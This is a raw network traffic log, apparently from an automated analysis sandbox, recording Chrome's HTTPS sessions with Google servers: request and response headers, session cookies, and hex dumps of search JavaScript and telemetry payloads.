2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 5f 73 73 70 22 3a 22 65 4a 7a 6a 34 74 54 50 31 54 63 77 7a 30 34 71 4d 44 56 67 39 4a 4a 4d 54 38 30 76 53 73 39 4d 56 45 67 71 7a 63 6c 4a 79 55 38 76 56 6b 6a 4c 7a 79 39 4a 53 73 7a 4a 41 51 44 71 7a 67 30 5a 22 7d 2c 22 7a 73 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 46 41 41 41 41 41 30 43 41 4d 41 41 41 41 71 71 6b 2f 54 41 41 41 41 6d 56 42 4d 56 45 58 2f 2f 2f 38 73 4b 69 6d 79 41 41 41 41 41 41 43 6d 70 61 55 62 47 42 61 66 6e 70 34 58 45 78 4b 34 74 37 63 70 4a 79 59 66 48 42 76 54 67 34 7a 59 6b 5a 6b 59 46 52 4d 6d 49 79 4c 6e 76 38 50 61 6d 61 41 53 44 67 7a 37 39 66 62 73 7a 4d 2f 42 50 6c 41 4d 42 77 50 51 65 59 50 76 37 2b 2f 76 31 Data Ascii: _ssp":"eJzj4tTP1Tcwz04qMDVg9JJMT80vSs9MVEgqzclJyU8vVkjLzy9JSszJAQDqzg0Z"},"zs":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAAA0CAMAAAAqqk/TAAAAmVBMVEX///8sKimyAAAAAACmpaUbGBafnp4XExK4t7cpJyYfHBvTg4zYkZkYFRMmIyLnv8PamaASDgz79fbszM/BPlAMBwPQeYPv7+/v1
2024-12-12 21:40:33 UTC	606	IN	Data Raw: 78 48 58 48 4c 54 4e 74 72 71 79 78 74 54 48 55 30 58 46 6e 63 6c 33 71 42 6c 44 78 6a 6e 69 48 56 30 65 57 39 41 53 71 6e 62 32 58 69 63 32 58 62 64 74 61 5a 2f 64 46 58 71 6a 6b 37 31 55 4d 54 55 71 5a 4b 52 6f 70 4e 57 39 6b 2b 75 65 43 38 6a 47 58 67 7a 31 6d 53 32 77 6c 52 72 7a 4c 71 56 36 63 62 65 46 37 57 30 56 69 4d 33 63 54 74 72 41 65 78 6e 33 39 4d 64 4c 55 4e 62 72 79 48 74 75 37 58 54 79 67 71 37 50 46 70 65 4c 79 51 63 2f 65 4e 75 33 55 44 62 67 48 39 74 4d 2f 57 73 79 57 37 45 42 66 55 34 65 6e 43 73 58 52 75 45 4e 6a 42 62 68 58 64 75 33 6f 72 35 2b 45 4f 2f 36 38 67 48 72 56 6b 76 74 61 52 31 34 64 79 34 35 35 4f 53 4a 61 6b 47 39 76 33 78 39 57 6d 44 4b 57 4c 73 69 4c 6a 62 70 75 61 44 44 54 4e 63 32 69 5a 35 4a 47 4d 37 75 38 71 4f 33 Data Ascii: xHXHLTNtrqyxtTHU0XFncl3qBlDxjniHV0eW9ASqnb2Xic2XbdtaZ/dFXqjk71UMTUqZKRopNW9k+ueC8jGXgz1mS2wlRrzLqV6cbeF7W0ViM3cTtrAexn39MdLUNbryHtu7XTygq7PFpeLyQc/eNu3UDbgH9tM/WsyW7EBfU4enCsXRuENjBbhXdu3or5+EO/68gHrVkvtaR14dy455OSJakG9v3x9WmDKWLsiLjbpuaDDTNc2iZ5JGM7u8qO3
2024-12-12 21:40:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49785	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:32 UTC	1104	OUT	GET /xjs/_/js/md=2/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:33 UTC	824	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 9387 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:26 GMT Expires: Fri, 12 Dec 2025 21:40:26 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 7 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:33 UTC	566	IN	Data Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 33 30 30 31 31 31 31 31 31 31 31 31 30 30 31 31 31 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 30 31 31 31 31 31 31 31 31 31 30 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: {"chunkTypes":"300111111111001110001111111001111000100001011010011111111111111001111111110111011111111111111111111101011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 Data Ascii: 121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212221212121212121212221222222221212121212121212122212121212121221212121212121212121212121112122212121212121212121
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 32 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 30 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111113111213111111111111111111111111111111111111111113111111113111111311111111111111111111111111101111111111111111111111111111111113111111111213111111111111111111111211111111213131111111111111113110111111010111111111111111111111111111111111111
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 32 31 32 31 32 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 32 31 32 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 31 32 31 32 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 31 31 31 31 32 31 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 31 32 31 33 33 31 31 31 31 31 31 31 31 31 33 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 33 31 31 31 31 31 31 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 Data Ascii: 212121221212121212121212121212121212121212121212121212121212121121212122122121121212121212121212121211211212112121211212121212111112112121212121121211213311111111132121212121212121212121212121212121212121212121212131111111211212121212121121212112121212121
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 33 31 31 31 31 31 31 31 32 31 32 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 33 33 31 33 31 31 33 31 31 31 33 33 31 31 31 31 31 31 31 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111311111311111112121121111111111111111111111111111111111111112121211111311111111111111133111111111111111111111111111111111113133131131113311111111331111111111111111111133331111111111111112
2024-12-12 21:40:33 UTC	481	IN	Data Raw: 30 30 30 30 30 30 30 31 32 32 32 32 32 32 32 32 32 32 32 31 31 33 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 33 31 31 31 31 33 31 31 31 32 32 32 32 32 32 32 32 32 32 33 31 31 31 31 31 31 32 32 32 32 33 31 30 30 30 30 32 30 32 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 31 33 31 31 32 32 32 31 32 32 32 32 32 32 31 31 32 31 31 31 31 31 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 33 33 31 31 31 32 32 32 33 32 30 30 30 30 30 30 30 30 30 32 30 30 30 30 Data Ascii: 000000012222222222211311000000000000000000000001131111111111111111231111311122222222223111111222231000020200000000002000000000000131122212222221121111111111100000000000000000000000000000000000000000000000000011111111111111113111111331112223200000000020000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49791	172.217.19.238	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:32 UTC	1105	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 408 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-Type: application/binary Content-Encoding: gzip sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=WEzy2GnTVCwd42wvY6cLz11ymcwUARJq0b8yzb-puulQFCcfrMH7cT_brk7HuA4AZKTjaQ3xhalkcNI12rZC3Rfa0rEgjsWoNZAPZW14aRoLTUNgtFCL9TgpV_3_L1wXS4addnHRJpNLLsgPhASys3Q-3WsTx-w7d9ZKvWN9U4jyHfIQy4Ue0Gc1SnRxOl06n3lUikj73ARjQvUjpGU
2024-12-12 21:40:32 UTC	408	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 0a cd 54 db 6a db 40 10 fd 95 b2 cf a3 30 b3 b3 57 4a 1e 9c 3c 04 52 5a 5a 42 5a c8 7a 09 52 a5 d8 06 c7 82 b4 a1 fd fc 8e a4 26 71 2d 05 3b 90 40 59 18 49 47 67 76 2e 7b 66 53 22 d8 dc af d7 07 9b 34 05 aa 66 a3 46 c4 94 d4 59 db 2e d6 cd bb d3 e5 5d 7b db 28 50 44 5e 65 48 ea 53 fb f3 fd ec f8 e4 ae dc d4 82 86 1e eb 49 ab fb db 07 5a 06 04 f5 6d b5 a9 db 5f 3f 3a 0c 8f 64 c9 cb ef e0 c4 0e 2c 81 6c e4 70 44 ac bb 3d 48 5c fa 95 c5 9b 3d 4b 0e 8a 3c 1b e4 e8 74 74 ce 8c 92 dc ad 23 11 46 30 68 10 c1 72 18 c0 b9 f2 68 09 c9 74 f1 e6 4a be bf 7c 5d 56 57 a1 34 67 e7 1f 8a 55 b1 f8 7c 5d f9 8f 61 b6 98 8f b6 9f 4b 63 7a 8f cb 8b 99 3c 11 02 50 70 56 0f 7f bb 54 ff d2 da 45 71 53 a2 c3 aa f9 5e 94 e4 9b c2 38 e2 22 b0 af 8a da 95 Data Ascii: Tj@0WJ<RZZBZzR&q-;@YIGgv.{fS"4fFY.]{(PD^eHSIZm_?:d,lpD=H\=K<tt#F0hrhtJ\|]VW4gU\|]aKcz<PpVTEqS^8"
2024-12-12 21:40:33 UTC	968	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://www.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w; expires=Fri, 13-Jun-2025 21:40:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Thu, 12 Dec 2024 21:40:33 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Thu, 12 Dec 2024 21:40:33 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:33 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-12-12 21:40:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49792	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:34 UTC	1704	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=lOO0Vd,sy8i,P6sQOc?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=WEzy2GnTVCwd42wvY6cLz11ymcwUARJq0b8yzb-puulQFCcfrMH7cT_brk7HuA4AZKTjaQ3xhalkcNI12rZC3Rfa0rEgjsWoNZAPZW14aRoLTUNgtFCL9TgpV_3_L1wXS4addnHRJpNLLsgPhASys3Q-3WsTx-w7d9ZKvWN9U4jyHfIQy4Ue0Gc1SnRxOl06n3lUikj73ARjQvUjpGU
2024-12-12 21:40:35 UTC	816	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1558 Date: Thu, 12 Dec 2024 21:40:35 GMT Expires: Fri, 12 Dec 2025 21:40:35 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:35 UTC	574	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 79 28 22 6c 4f 4f 30 56 64 22 29 3b 0a 5f 2e 6c 6d 62 3d 6e 65 77 20 5f 2e 5a 64 28 5f 2e 55 50 61 29 3b 0a 5f 2e 7a 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 73 6d 62 3b 5f 2e 74 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 74 68 69 73 2e 63 75 61 3d 61 3b 74 68 69 73 2e 50 4f 63 3d 62 3b 74 68 69 73 2e 55 35 61 3d 63 3b 74 68 69 73 2e 61 54 63 3d 64 3b 74 68 69 73 2e 4b 31 63 3d 65 3b 74 68 69 73 2e 68 5a 61 3d 30 3b 74 68 69 73 2e 54 35 61 3d 73 6d 62 28 74 68 69 73 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.y("lOO0Vd");_.lmb=new _.Zd(_.UPa);_.z();}catch(e){_._DumpException(e)}try{var smb;_.tmb=function(a,b,c,d,e){this.cua=a;this.POc=b;this.U5a=c;this.aTc=d;this.K1c=e;this.hZa=0;this.T5a=smb(this
2024-12-12 21:40:35 UTC	450	IN	Data Raw: 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 50 36 73 51 4f 63 22 29 3b 0a 76 61 72 20 76 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 5f 2e 51 61 28 61 2e 59 61 62 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 62 5b 65 5d 3d 21 30 7d 29 3b 76 61 72 20 63 3d 61 2e 67 61 62 28 29 2c 64 3d 61 2e 72 61 62 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 74 6d 62 28 61 2e 71 61 62 28 29 2c 5f 2e 76 64 28 63 2c 31 29 2a 31 45 33 2c 61 2e 76 24 61 28 29 2c 5f 2e 76 64 28 64 2c 31 29 2a 31 45 33 2c 62 29 7d 2c 77 6d 62 3d 21 21 28 5f 2e 42 68 5b 32 37 5d 3e 3e 32 38 26 31 29 3b 76 61 72 20 78 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6b 61 3d 5f 2e 64 65 28 5f 2e 6e 6d 62 29 3b 74 68 69 73 2e 77 61 3d 5f 2e Data Ascii: ption(e)}try{_.y("P6sQOc");var vmb=function(a){var b={};_.Qa(a.Yab(),function(e){b[e]=!0});var c=a.gab(),d=a.rab();return new _.tmb(a.qab(),_.vd(c,1)1E3,a.v$a(),_.vd(d,1)1E3,b)},wmb=!!(_.Bh[27]>>28&1);var xmb=function(){this.ka=_.de(_.nmb);this.wa=_.
